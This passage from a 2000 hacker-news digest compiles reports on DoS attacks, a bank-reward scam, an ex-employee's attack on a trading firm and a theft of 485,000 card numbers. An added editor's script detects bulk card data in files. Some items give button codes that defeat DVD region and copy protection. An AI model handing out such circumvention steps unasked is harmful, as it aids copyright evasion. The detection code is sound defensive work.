MSNBC reported the Brazil problem after a network analyst at the Bank of Brazil in Brasilia reported that he could not access the JPL site. The service also reported that a CERT official at its headquarters in Pittsburgh, Pa., said that blocking access to an entire network or country is reasonably common, though the official said that with spoofing attacks - when the address of the attacking e-mail in a denial of service attack is falsified - blocking against a particular domain or country code becomes largely ineffective.

O'Donnell said that CERT and the JPL have been working jointly on security issues.

Reported by Newsbytes.com, http://www.newsbytes.com . 13:15 CST

@HWA

32.0 HNN:Mar 16th:FBI Site Hit by DOS Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

Just as the FBI was posting information about the 50th anniversary of its "Ten Most Wanted Fugitives" to its web site it was hit with a denial of service attack. The attack forced the web site offline for several hours.

UPI - via Virtual New York
http://www.vny.com/cf/News/upidetail.cfm?QID=71527

FBI Web site attacked

Wednesday, 15 March 2000 15:15 (ET)

By MICHAEL KIRKLAND

WASHINGTON, March 15 (UPI) -- There has been another "denial of service" cyber-attack against a high-profile Web site, sources told UPI Wednesday -- this time the target was the FBI's own Web page, which was taken out of action for several hours Tuesday.

The attack hit just as the FBI was posting information about the 50th anniversary of its "Ten Most Wanted Fugitives" list, which was celebrated Tuesday at the bureau with the opening of a permanent headquarters exhibit.

A "denial of service" attack overwhelms a Web site with requests for information, but with "spoofed" -- fabricated -- return e-mail addresses. A site tries to endlessly answer the requests, and in effect ties itself in knots until it shuts down.

There was no indication yet on whether Tuesday's cyber-attack was a "distributed" denial of service attack, similar to those launched against major commercial sites on the Internet early last month. Those attacks temporarily crippled Yahoo!, E-Trade, CNN.com and others.

U.S. investigators were still pursuing leads on the latest attack Wednesday, defining its nature.

A "distributed" attack is one which uses "innocent" third-party computer systems. Illegal hackers, called "crackers," usually find the attack software "tools" available "in the wild" on the Internet. The "distributed denial of service," or DDOS, tools enable a cracker to break into an unsuspecting computer system and implant "packets" or "daemons" that will cause the system to launch an attack against a target unless detected and disabled in time. Literally hundreds of "zombie" computer systems can be infected, without their operators' knowledge, and can launch a simultaneous attack.

The FBI is still searching for at least two unnamed suspects in February's attacks. Much of the search has been concentrated in Canada with the help of the Royal Canadian Mounted Police. Agents are also concentrating on Germany, where the DDOS "tools" may have originated, though Germany is not believed to be the country of origin for the actual attacks.

There was no immediate indication Wednesday that the attack on the FBI site came from the same suspects wanted for the attacks on the commercial sites.

--
Copyright 2000 by United Press International. All rights reserved.

@HWA

33.0 HNN:Mar 16th:Teenager Arrested in Online Bank Scam
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Someone has finally been arrested in a scam that has been circling around the Internet for months. Various online banks offer cash rewards just for opening an account.
The scam works by opening several accounts under false names and then transferring the free money from each account into a real account. A 14 year old student at Thomas Jefferson Middle School in Jefferson City Missouri was able to amass over $2000. The scam was uncovered by a postal worker after he started delivering 'bushels' of mail to an address owned by the kid's father. (Discovered by a postal worker?)

APB News
http://www.apbnews.com/newscenter/internetcrime/2000/03/15/netbanker0315_01.html

Teen Busted in Internet Banking Scam
120 Fake Accounts Yielded $2,000 in Rewards

March 15, 2000

By Carol Huang

JEFFERSON CITY, Mo. (APBnews.com) -- An eighth-grader in rural Missouri signed up for more than 120 fake bank accounts through the Internet to rake in a total of $2,000 in new customer cash rewards, authorities said today.

"He didn't realize the gravity of what he was doing, but he knew it was wrong and that it wasn't his money," said Cole County Sheriff John Hemeyer.

Hemeyer said the boy, 14, a student at Thomas Jefferson Middle School, had been helping his father, a self-employed construction contractor, enter business records onto a computer when he found an Internet site offering an opportunity to open a bank account.

Eventually, the teen had more than 120 accounts at banks around the country, each under a name generated by his computer, and had transferred more than $2,000 in cash freebies into a real account of his own.

Puzzled postal worker

A puzzled postal worker reported delivering "bushels of baskets of mail" to a vacant trailer on a plot of land, and investigating deputies went to the boy's father, who owns the land.

Besides entering the teen into the juvenile court system, deputies confiscated his computer, which he had upgraded using the cash rewards, Hemeyer said.

"It's the only referral we've ever had on this kid. So if he quits, and pays back some money, that will be about it," Hemeyer said.

Carol Huang is an APBnews.com staff writer (carol.huang@apbnews.com).

@HWA

34.0 HNN:Mar 16th:Former Employee Arrested For Attack On Company
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

31 year old Abdelkader Smires was charged in United States District Court in Brooklyn with computer-related fraud and remained in custody pending a bail hearing on Friday. Smires is being accused of causing his former company, Internet Trading Technologies, Inc. (ITTI), which provides software that allows market-makers to conduct online securities transactions, to shut down several times since last Thursday by directing coordinated attacks against the firm's computer networks.

NY Times
http://www.nytimes.com/aponline/a/AP-Cyber-Spat.html

C|Net
http://news.cnet.com/news/0-1007-200-1573627.html?tag=st.ne.1002.thed.1007-200-1573627

Associated Press - via San Jose Mercury News
http://www.sjmercury.com/breaking/docs/073358.htm

NYTimes: pay

-=-

C|Net

ITTI employee arrested in hacker attack

By Bloomberg News
March 15, 2000, 4:20 p.m. PT

An employee of Internet Trading Technologies, a provider of trade-execution services for securities firms, was arrested yesterday and charged with attacking ITTI computers and causing interruptions in its services this week, the U.S. Attorney's Office in Brooklyn said.

The employee, Abdelkader Smires, a database programmer, launched a series of data transmissions intended to cause the firm's computers to crash after he became involved in a dispute with his employers, according to U.S. Attorney Loretta Lynch. He was arraigned in federal court in Brooklyn yesterday and ordered held without bail, Lynch said.

ITTI's software system allows securities firms to trade Nasdaq stocks online, a representative for the company said. It is marketed by other firms, such as Trimark Group, under their own brand names, she said. The system links small broker-dealers with market-makers like Knight/Trimark, Mayer & Schweitzer and others, a Knight/Trimark spokesman said. Firms use it so they don't have to install and maintain direct hardware and software connections to market-makers.

Smires' attacks caused "significant interruption of ITTI's trade execution over the past three business days," Lynch said. "If the attacks had continued to cause denial of service, the viability of ITTI would have been threatened, resulting in major disruption of trading on the Nasdaq," she added.

The U.S. Secret Service's Electronic Crimes Task Force, which is a cooperative effort of 25 local, state and federal agencies and 45 private companies, helped trace Smires' computer attacks, said Bob Weaver, a Secret Service representative.

Conflict developed between Smires and his bosses when ITTI's chief development officer, who had hired Smires and was his supervisor, resigned March 6, according to an affidavit filed in the case by Secret Service Agent Peter Cavicchia. The firm then hired systems consultants to help fill the gap created by the departure, but Smires and another, unidentified programmer refused to help train the newcomers on ITTI's systems, according to the affidavit.

Smires and the other programmer then told the firm's executives that they would quit unless they were given "more employment security, a greater salary and a greater equity interest in the firm," Cavicchia said. ITTI responded by offering them one-year employment contracts, raises and stock options, he said.

Smires and the other programmer nevertheless decided to resign, according to the affidavit. The pair demanded "$70,000 immediately, 50,000 stock options and more substantial salary increases," Cavicchia said. A "tentative agreement" was reached March 8, Cavicchia said. The next day, Smires and the other programmer backed out of the agreement, demanded more favorable terms and said ITTI executives should call them only if the firm agreed to the specific counter-offer, Cavicchia said. ITTI didn't call.

Later on March 9, the attacks on ITTI's system began. The attacks continued Friday, Monday and yesterday, according to the affidavit, shutting down ITTI's computers for a total of about five hours.

"While one of the attacks was occurring, ITTI computers revealed the Internet Protocol address of the attacking computer," enabling employees to trace it to a building on the Queens College campus in Flushing, New York, where Smires is an instructor, Cavicchia said. Secret Service agents were told that the particular Queens College computer from which the attack was launched was being used by Smires at the time, the affidavit said. After his arrest, Smires admitted that he was responsible for the March 13 and March 14 attacks, Cavicchia said. Smires also waged some of his attacks from a Kinko's copy shop in Manhattan, Lynch said.

Copyright 2000, Bloomberg L.P. All rights reserved.

-=-

Assoc.Press; 404

@HWA

35.0 HNN:Mar 16th:PlayStation2 can Play US DVD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse

Some DVDs released for the North American Region can be played on PlayStation2 consoles in England. Pressing buttons in a certain sequence while the PlayStation2 boots up into DVD mode can sometimes allow Region 1 CDs to be played on the Region 2 device. (Wonder if this will have any effect on the DeCSS lawsuit?)

The Register UK
http://www.theregister.co.uk/000315-000017.html

Gaming Intelligence Agency
http://www.thegia.com/news/0003/n11a.html

Register;

Posted 15/03/2000 5:04pm by Linda Harrison

PlayStation 2 can play US DVDs - apparently

Gaming boffins claim to have found a way to play American DVDs on PlayStation 2 consoles.
Three codes have surfaced which make it possible to play Region 1 (North America) DVDs on the PlayStation 2 -- a Region 2 (Europe, Japan and Asia) DVD player. Like console video games, DVDs are usually fixed by vendors so they can only operate within specific world markets. It was previously believed the PlayStation 2, launched solely in Japan, could play only Region 2 DVDs. But the Gaming Intelligence Agency's Web site this week claimed to have found the codes needed to overcome this inconvenience.

These codes do not work every time -- a hitch believed to be linked to how hard the Dual Shock 2's buttons are pressed. "All three codes should be entered when the PlayStation 2 DVD bootup sequence begins fading to black... If you get a region failed message, don't despair; just try again. The same disc will work some times and not others," it reports. "While these codes certainly leave room for improvement, the advent of any region bypass is good news for system importers and DVD fans," thegia.com adds. Sony Computer Entertainment in the UK chose not to comment.®

-=-

GIA;

Play American DVDs on Japanese PlayStation 2 [03.11.00]
» Simple controller codes make it possible.

Two simple controller codes have recently surfaced that make it possible to play Region 1 (North America) DVDs on the PlayStation 2, a Region 2 (Japan and Asia) DVD player. Much like console videogames, DVDs are region encoded to dissuade consumers from importing titles from outside of the country. It was previously believed that the PlayStation 2 would only play Region 2 DVDs. These codes currently only work with about partial frequency. We are currently unsure why they do not work 100% of the time; we believe they may be dependent on how hard the user presses the Dual Shock 2's analog buttons. If you own a PS2 and Region 1 movies, the GIA is interested in hearing about your experiences with the code, especially if you find a way to make Region 1 movies play with greater frequency.
Please e-mail staff@thegia.com with the movie tested, code used, and the tries / success ratio. All three codes should be entered when the PlayStation 2 DVD bootup sequence begins fading to black. The buttons should be held until either the DVD movie starts up (1 line of Japanese) or a "region failed" message appears (2 lines of Japanese). If you get a region failed message, don't despair; just try again. The same disc will work some times and not others. The first code comes from the GIA's own J.T. Kauffman; it is apparently circulating Japanese message boards and web sites. The code is: hold down L1, Circle, and Select. This code has worked with both the Dual Shock 1 and 2 with about 40% accuracy. The second code comes from a friend of the GIA known as Barubary. The code is: press in L3 (the left analog stick) straight and hard. This code does not work with the Dual Shock 1, but works with the Dual Shock 2 with about 60% accuracy. The newest, third code comes from GIA friend Nick "Rox" Des Barres. Nick reports that this code works an astounding 95% of the time. The instructions follow: Insert a first-generation PlayStation pad (i.e., not an analog controller) in Control Port 1 of the PS2. Insert DVD Hold UP on the pad until the DVD menu appears Highlight the play icon and select it. Nick adds, "I tried this on 20 or so DVDs, and it booted all of them. Two or three would not play. You could access the menus, however. It should be noted I was using a Japanese first-generation PS1 pad, though I can't imagine why it wouldn't work with American ones." While these codes certainly leave room for improvement, the advent of any region bypass is good news for system importers and DVD fans. The GIA will keep you posted on any new developments on the PS2 DVD front. 
@HWA

36.0 HNN:Mar 16th:ISTF Releases Security Recommendations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Chris

The Internet Security Task Force, a conglomeration of big-name tech companies, ISPs and other e-business firms, has produced a "vendor neutral set of recommendations in understandable language" about the problems and solutions in internet security. The paper doesn't say anything new, but because it was released by "credible" vendors and not "the evil underground" some suits might finally pay attention. But then again, maybe not.

Initial Recommendations For Conducting Secure eBusiness
http://www.ca.com/ISTF/recommendations.htm

@HWA

37.0 HNN:Mar 17th:485,000 Credit Card Numbers Stolen, Found on Gov Computer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

A file containing credit card numbers, expiration dates, names and addresses was found last year on a US government website. The thief has been traced back to a European country but it has not been revealed which one. It has also not been revealed which online service the numbers came from or which government agency was unwittingly storing the numbers. The incident has been confirmed by the Secret Service but first came to light when a bank employee notified reporters. The bank received the notice of the credit card heist from Visa but failed to notify its card holders.

MSNBC
http://www.msnbc.com/news/382561.asp

Vast online credit card theft revealed
Hacker hid data on 485,000 cards on U.S. agency’s Web site

By Mike Brunker
© MSNBC

March 17 — In the largest known case of cybertheft, a computer intruder stole information on more than 485,000 credit cards from an e-commerce site and then secretly stored the massive database on a U.S. government agency’s Web site, MSNBC.com has learned.
Credit card companies notified financial institutions, but many of the compromised accounts remain open to this day because the banks neither closed them nor notified customers of the theft.

THE HEIST occurred in January 1999, but only a few details have previously been made public. The scope of the crime emerged in a letter dated Dec. 27 from Visa USA to member financial institutions. Jim Macken, a Secret Service spokesman, confirmed that the incident had occurred and added some details in an interview on Thursday.

The Visa letter, a copy of which was provided to MSNBC by a source in the banking industry, quotes federal authorities as saying that the credit card information — including expiration dates and cardholder names and addresses — was stolen from an Internet retail site by a hacker. It said the store of data on Visa, MasterCard, American Express and Discover cards was discovered on an unspecified government computer system during an audit. The letter did not say when the stolen data was found, but Macken said it was discovered before March 1999 on the Web site of a U.S. government agency, which he declined to identify. "This government Web administrator noticed that a lot of the memory was chewed up for no reason, so he checked and found the file (containing the stolen data)," he said.

NO EVIDENCE OF FRAUDULENT USE

There was no evidence that any of the cards were used to commit fraud and some of the accounts were not active, Macken added. The letter said that authorities had not identified the thief, but Macken said investigators have since traced the criminal to Eastern Europe. The investigation is ongoing and involves diplomatic contacts with the country in question, he said. The Internet retail site from which the data was stolen has also since been identified, but Macken declined to name it.
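Ed. note: the stash was only found because an administrator noticed disk space vanishing and went looking. Size is a weak signal; what the file contains is the better one. The script below is an added example written for this issue, not code from MSNBC, the Secret Service or the agency involved. It walks a directory tree, pulls out candidate 13 to 19 digit numbers, keeps only those that pass the Luhn check that payment card numbers satisfy, and reports any file holding many of them. The web root layout, file names and card records are constructed test data; the generated numbers use a 411111 prefix with a computed check digit and are not real accounts.

```python
"""Find files that hold bulk payment-card data by content, not by size.

Added example for HWA; constructed sample files, no real account numbers.
"""
import os
import re
import tempfile

# A candidate PAN: 13 to 19 digits, optionally grouped with spaces or dashes,
# not embedded in a longer digit run.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits):
    """Luhn check used by payment-card numbers: double every second digit
    from the right, subtract 9 from doubled values above 9, sum must be
    divisible by 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def with_check_digit(partial):
    """Append the one digit that makes `partial` pass the Luhn check."""
    for d in "0123456789":
        if luhn_ok(partial + d):
            return partial + d
    raise ValueError("unreachable: exactly one check digit always works")


def count_pans(text):
    """Number of Luhn-valid candidate numbers in a block of text."""
    hits = 0
    for m in PAN_RE.finditer(text):
        if luhn_ok(re.sub(r"[ -]", "", m.group())):
            hits += 1
    return hits


def scan_tree(root, min_hits=10, max_read=4 * 1024 * 1024):
    """Walk `root`; return [(path, size, hits)] for files with at least
    min_hits valid card numbers in their first max_read bytes, biggest
    offenders first. latin-1 decoding never fails, so binaries get
    scanned too (digits are ASCII either way)."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                size = os.path.getsize(path)
                with open(path, "rb") as fh:
                    data = fh.read(max_read)
            except OSError:
                continue
            hits = count_pans(data.decode("latin-1"))
            if hits >= min_hits:
                findings.append((path, size, hits))
    return sorted(findings, key=lambda t: -t[2])


def build_sample_tree():
    """Constructed web root: harmless log and phone files plus one card dump.
    PANs are built from a 411111 prefix and a counter; they are not real."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "logs"))
    os.makedirs(os.path.join(root, "tmp"))
    with open(os.path.join(root, "logs", "access.log"), "w") as fh:
        for i in range(20):
            fh.write(f'192.0.2.{i} - - [13/Mar/2000:14:02:{i:02d} -0500] '
                     f'"GET /index.html HTTP/1.0" 200 1234\n')
    with open(os.path.join(root, "phones.txt"), "w") as fh:
        fh.write("front desk 555-0100\nsecurity 555-0199\n")
    with open(os.path.join(root, "tmp", "carddump.txt"), "w") as fh:
        fh.write("pan,exp,name,address\n")
        for i in range(50):
            pan = with_check_digit("411111" + f"{i:09d}")
            if i % 2:  # half are written in 4-digit groups to exercise the regex
                pan = " ".join(pan[j:j + 4] for j in range(0, 16, 4))
            fh.write(f"{pan},12/2001,Cardholder {i},{i} Main St\n")
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for path, size, hits in scan_tree(root):
        print(f"{hits:5d} valid PANs  {size:8d} bytes  {os.path.relpath(path, root)}")
```

Luhn alone passes about one in ten random digit strings, which is why the scan reports files by count rather than flagging single matches; the log and phone files above produce no hits at all, while the dump produces fifty. The regex deliberately allows spaces and dashes inside a number, so two numeric fields separated only by a space can merge into one candidate and be missed; run it on delimited data or tighten the separator set if that matters.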
It was unclear why the thief hacked the government Web site and stored the data there, Macken said, though he allowed that the act might have been the online equivalent of thumbing one’s nose at U.S. authorities. As MSNBC reported last week, U.S. authorities have so far been stymied in their attempts to prosecute credit card thieves and fraud rings based in the former Soviet bloc nations and Asia. Secret Service officials testified about some details of the case before Congress early last year to demonstrate the peril that computer hackers pose to online commerce, Macken said. Their comments generated little coverage, however, and the scope of the case is only now becoming clear.

EFFORT TO HIGHLIGHT INACTION

The copy of the letter from Visa was obtained by MSNBC from an employee at the Navy Federal Credit Union, in Merrifield, Va., the world’s largest credit union with 19 million members. The letter was provided, the source said, to highlight the fact that some financial institutions are failing to act to protect consumers when there is evidence that their credit card information has been stolen. Officials at the credit union took no action to warn customers whose account numbers were among those stolen by the hacker, said the source, who spoke on condition of anonymity. Instead, they ordered a "spot check" of 50 to 100 accounts and then decided that no further action was necessary, the source said. The source said the same procedure was followed two weeks later, when Visa alerted the institution of the theft of data on 300,000 credit cards from the CD Universe Web site — the biggest theft of credit card data over the Internet that previously had been made public. "It was decided that ... it would be too much of an inconvenience and too costly to shut down the accounts and issue new numbers," said the source. "It was deemed not the credit union’s responsibility."
The credit union source said that fraudulent charges have subsequently appeared on some of the accounts that were compromised, though it is impossible to definitively link the fraud to the theft.

CREDIT UNION RESPONDS

In a statement issued Friday in response to MSNBC.com’s story, Navy Federal Credit Union officials did not challenge the assertion that they did not warn customers of the theft. But they denied that cost or inconvenience were factors in the decision. "When we received notification of this problem from VISA USA, we reviewed our systems and were confident that all appropriate controls were in place to protect our members’ financial welfare," said Tom Steele, a credit union vice president in charge of the credit card division. "Additional checks of the 1,500 Navy Federal credit card accounts identified by VISA USA confirmed that the steps we had taken safeguarded every cardholder — we have also not seen any increase in fraud losses." The statement also indicated that no Navy Federal cardholders have been victims of identity theft as a result of the heist.

Calls to American Express and a half dozen major banks seeking information on their response when notified of the theft were not returned. Scott Lynch, a spokesman for Visa USA, said he could not comment on the case. Nor would he explain why Visa didn’t notify its members of the theft until December. Alicia Zatkowski, a spokeswoman for Discover Financial Services, said the firm’s fraud investigators were not aware of such a case. Vincent DeLuca, vice president of fraud control at MasterCard International, said, "We are aware of some cases but we’re not at liberty to talk about any ongoing investigations." Several financial institutions ordered the wholesale closure and replacement of cards that were compromised in the CD Universe case, which also remains under investigation. Such across-the-board replacement programs were well publicized in an effort to assure online consumers.
Banks and credit card companies often point out that consumers are responsible only for the first $50 of fraudulent online purchases — and that is nearly always waived. But stolen credit card information can be used to commit fraud against unsuspecting Internet merchants, who in most cases bear the cost of the crime, or for identity theft — a practice in which criminals use personal data to obtain new credit, borrow money or make big-ticket purchases. The Treasury Department on Wednesday held a two-day national summit on identity theft to focus attention on what Treasury Secretary Lawrence Summers described as "a growing and major criminal threat." At the session, victims said that while they did not ultimately have to pay for the losses run up in their names, identity theft is by no means a victimless crime. "It has been sheer hell, and I do mean hell," said Darlene Zele, a Rhode Island hospital worker who was one of the victims who testified about years of struggling to repair the havoc wrought on their credit records. "At this point, after five years, it’s still not over."

@HWA

38.0 HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by webmaster

A group called DDoS-BR is spreading denial of service attacks against Brazilian government networks. The Brazilian Supreme Court and the National Telecommunications Agency web sites have been shut down for most of the week due to the attacks. The Brazilian authorities are looking forward to legislation that will soon be approved which might give the federal police enough power to investigate and arrest electronic criminals. (Hopefully they have the knowledge to use that power wisely.)

SecureNet - In Spanish correction: Portuguese ...
http://www.securenet.com.br/cgi-bin/news?id=15030003 @HWA 39.0 HNN:Mar 17th:Secret Service Harassing Bernie S Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by macki Five years to the day after Bernie S. was arrested at gunpoint and subjected to nearly 17 months of imprisonment by the United States Secret Service, agents of the USSS have again begun some kind of cat and mouse game, the nature of which has yet to be revealed. 2600 http://www.2600.com/news/2000/0317.html SECRET SERVICE HARASSING BERNIE S AGAIN 03/17/00 Five years to the day after Bernie S. was arrested at gunpoint and subjected to nearly 17 months of imprisonment by the United States Secret Service, agents of the USSS have again begun some kind of cat and mouse game, the nature of which has yet to be revealed. A Special Agent from the Secret Service showed up unannounced at Bernie's workplace and told his employer they wanted to question Bernie, who happened to be out sick that day. When Bernie returned to work the following day and discovered the Secret Service wanted to talk to him, he surprised the agent by calling him. What followed was an extremely strange and circular conversation. At first the SS agent wouldn't talk to him at all. Then he called Bernie back and said they needed to talk with him at his home at 7am the next morning. When Bernie explained he was just getting over a serious illness and that this was an unreasonable hour, the agent suggested 6am. Bernie repeatedly offered to answer their questions at several neutral locations, but they said any place other than his home was unacceptable. Bernie told them he had nothing to hide, but that he was not comfortable having Secret Service agents poking around inside his house and that they would have to get a warrant before he'd let them in. The agent then said he had to go and would talk to him later. 
About ten minutes later, a second, more polished, SS agent called Bernie and continued trying to persuade him to let them inside his home. The agent tried to goad Bernie by implying he must have something to hide, and that if he didn't then there was no reason why they shouldn't be allowed inside his home. At this point, Bernie tried to explain by saying if you asked 100 people on the street if they'd want federal agents in their living room and bedroom, almost everyone would say no and that he was no exception. The SS agent disagreed, saying people have no legitimate fears about such a visit. Bernie repeatedly tried to get the SS agents to tell him what they wanted. Finally, the second agent said, "I need to check to see if your telephone and Cable TV wiring is hooked up properly." This preposterous claim made Bernie actually laugh out loud. But as a further gesture of cooperation, Bernie offered to allow Bell Atlantic and Comcast Cable TV technicians to inspect his house wiring for them. The SS agents said that, too, would be unacceptable. It became clear the SS agents were simply trying anything they could to get a foot in his door. Needless to say, after Bernie's previous horrendous experience with the Secret Service, their feet are not welcome in his home. He then gave them his attorney's name and telephone number and told them to address future inquiries directly to his lawyer. So what is this all about? We don't know yet, but clearly something is up. And the way the Secret Service has played sick games with people's lives in the past, we felt it would be wise to alert everyone now so we can all keep a closer eye on them before they try any further outrageous actions under the veil of secrecy. @HWA 40.0 HNN:Mar 17th: Secret Service to Work with Citicorp to Fight Fraud ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The U.S. 
Secret Service and Citicorp, a unit of New York-based Citigroup Inc., are working together to develop a pilot program to fight identity theft and other types of e-commerce fraud. The program will devise a strategy to identify suspicious e-commerce activities, including forged identities and other schemes used to commit bank and credit fraud. Computer World http://www.computerworld.com/home/print.nsf/all/000316C9BE US Treasury Dept. - Press Release http://www.ustreas.gov/press/releases/ps465.htm Computer World; Secret Service, Citicorp team to fight e-commerce fraud U.S. Treasury Department announces new initiatives to combat identity, other types of e-commerce fraud By Linda Rosencrance 03/16/2000 The U.S. Secret Service and Citicorp, a unit of New York-based Citigroup Inc., are working together to develop a pilot program to fight identity theft and other types of e-commerce fraud, according to a statement issued by the U.S. Treasury Department. The announcement was made at the two-day National Summit on Identity Theft convened by Treasury Secretary Lawrence H. Summers yesterday. The summit includes more than 150 participants from federal, state and local government agencies; financial institutions; credit-card companies and reporting agencies; as well as identity theft victims and consumer advocacy groups. "Criminals are exploiting new technologies to make a significant profit from an old crime," Summers said in the statement. "We will continue to work with the private sector to strengthen our efforts to combat this threat." The program being developed by the Secret Service and Citicorp will devise a strategy to identify suspicious e-commerce activities, including forged identities and other schemes used to commit bank and credit fraud. At yesterday's summit, Summers also said that the Secret Service is developing a computer-based training program to help law enforcement officials handle financial crimes. 
-=-

Press Release;

TREASURY NEWS
FROM THE OFFICE OF PUBLIC AFFAIRS

FOR IMMEDIATE RELEASE
March 15, 2000
LS-465

TREASURY CONVENES IDENTITY THEFT SUMMIT

Treasury Secretary Lawrence H. Summers convened a two-day National Summit on Identity Theft today and announced four new initiatives targeted at cracking down on the increasing threat of identity theft. "Criminals are exploiting new technologies to make a significant profit from an old crime," said Treasury Secretary Summers. "We will continue to work with the private sector to strengthen our efforts to combat this threat."

Called for last year by President Clinton, the Summit will address the prevention of identity theft, remediation and enforcement efforts with the public and private sector. The Summit will consist of a series of panels and more than 150 participants from federal, state and local government agencies, financial institutions, credit card companies and reporting agencies, as well as identity theft victims, consumer advocacy groups and private sector representatives.

The four new Treasury initiatives to help combat identity theft include:

Skimming and counterfeit check databases currently used to identify common suspects, defendants of identity theft, and address criminal trends prevalent in financial crimes today. These databases were developed and are maintained by the U.S. Secret Service in partnership with the financial industry;

A computer-based training module developed by the U.S. Secret Service that will focus on financial crimes and all pertinent statutes including identity theft, and be made available within the agency as well as local and state law enforcement officials throughout the U.S.;

A pilot program, developed by the U.S. Secret Service and Citicorp, to help identify suspicious activity on electronic commerce.
The program will attempt to develop a protocol for the identification of identity theft and other schemes used to commit bank fraud, credit fraud and money laundering within electronic commerce and the immediate notification of law enforcement authorities; and

Forums and mini-conferences to maintain a dialogue between the private and public sector.

Treasury's National Summit on Identity Theft is the first national level conference involving law enforcement, victims, industry and nonprofits interested in the issue.

@HWA

41.0 HNN:Mar 17th:Computer History Lecture Series
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by McIntyre

The Computer Museum History Center, a non-profit entity dedicated to the preservation and celebration of computing history, will be having a lecture series entitled "Early Computer Crime". Speakers include Whitfield Diffie, John Markoff, Peter Neumann and Cliff Stoll. The Lecture will be held on Thursday, March 23, 2000 at NASA Ames Research Center Auditorium, Moffett Field, Mountain View, CA. It is requested that RSVPs be received by Monday March 20. (Sounds like fun. I would like to cheer some of the speakers and heckle others.)

The Computer Museum
http://www.computerhistory.org/events/earlycrime_03232000/

@HWA

42.0 HNN:Mar 17th: Australian Police To Increase Online Presence
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

Australian Federal Police Commissioner Mick Palmer said that in an effort to get better training for the people they already have and in an effort to attract more qualified applicants the Police will conduct a staff exchange with private industry. The commissioner will also establish an Electronic Crime Steering Committee to evaluate Australia's capacity to fight electronic crime and will develop an Australian Law Enforcement Electronic Crime Strategy by mid-summer.
The Age http://www.theage.com.au/breaking/0003/17/A15120-2000Mar17.shtml Police to step up fight against e-crime Source: AAP | Published: Friday March 17, 3:38 PM Police are set to recruit computer boffins in a bid to boost the fight against so-called e-crime. The potential to commit crimes using computers and other information technology was one of the greatest problems ever to face law enforcement, Australian Federal Police Commissioner Mick Palmer said today. Speaking at the end of a week-long conference of police commissioners from Australia, New Zealand, Fiji and Papua New Guinea, Commissioner Palmer said a staggering 900 million people would be using the Internet by the end of this year. 'People who abuse these technologies have the capacity to commit offences on a global basis, with complete anonymity, with speed and on a scale not previously encountered,' Commissioner Palmer told journalists. Credit card fraud, electronic vandalism, terrorism, electronic money laundering and tax evasion are some examples of electronic crime. 'The capacity of properly organised, electronic based crime to undermine the financial stability of small and medium sized countries is very real,' Commissioner Palmer said. A major problem for police is how to attract personnel with enough technical expertise to fight this new crime. Commissioner Palmer said already police recruitment and selection was becoming more flexible. 'Clearly some of the technical skills that we are going to need ... come at a very high cost,' he said. 'People ... in that industry are earning a lot of money and that makes the partnerships with business and the wider business community very important.' Police will be looking to exchange staff with private industry to gain the skills necessary, probably on short term, project based arrangements. Commissioner Palmer said discussions and negotiations had already begun on this issue and Commonwealth Bank CEO David Murray addressed the commissioners. 
'We will be recruiting people from the coalface for short periods of time, we are going to be sharing resources between ourselves and the wider partnership both in the private and public sense.' The commissioners agreed to establish an Electronic Crime Steering Committee to evaluate Australasia's capacity to fight electronic crime. It will develop an Australasian Law Enforcement Electronic Crime Strategy by the end of June.

@HWA

43.0 HNN:Mar 17th:Apex DVD Defeats Region and Macrovision
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Sciri

Hot on the trail of the PlayStation2 being able to play Region 1 discs is the Apex AD-600A, a DVD/VCD/CD/MP3 player that can disable CSS, Region and Macrovision settings after entering a simple code (Preferences -> Step -> Prev Track -> Next Track).

Review of the Apex-600A
http://uberauk.epinions.com/elec-review-10C9-40ABFE-388DCD5F-bd3

Nerd Out
http://www.nerd-out.com/

@HWA

44.0 HNN:Mar 20th:First Malicious Code Directed at WebTV
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Hal0

Microsoft is working on a patch of its service to counteract malicious programming code that overloads WebTV newsgroup discussions with fake postings. Although the code self-replicates like a virus, Microsoft insists on calling it "malicious code". The code appends itself to a WebTV user's signature file and then cross-posts itself to numerous newsgroups.

Wired
